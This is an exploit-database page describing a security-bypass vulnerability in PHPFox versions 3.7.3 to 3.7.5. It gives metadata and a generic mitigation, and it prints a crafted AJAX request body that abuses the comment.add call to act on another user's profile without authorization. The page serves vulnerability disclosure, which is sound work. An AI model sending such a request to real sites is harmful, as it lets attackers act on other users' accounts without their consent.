header-logo
Suggest Exploit
vendor:
PHPFox
by:
SecurityFocus
7,5
CVSS
HIGH
Security-Bypass
287
CWE
Product Name: PHPFox
Affected Version From: 3.7.3
Affected Version To: 3.7.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

PHPFox Security-Bypass Vulnerability

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/66677/info

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Navigation

Suggest Exploit

Services By CQR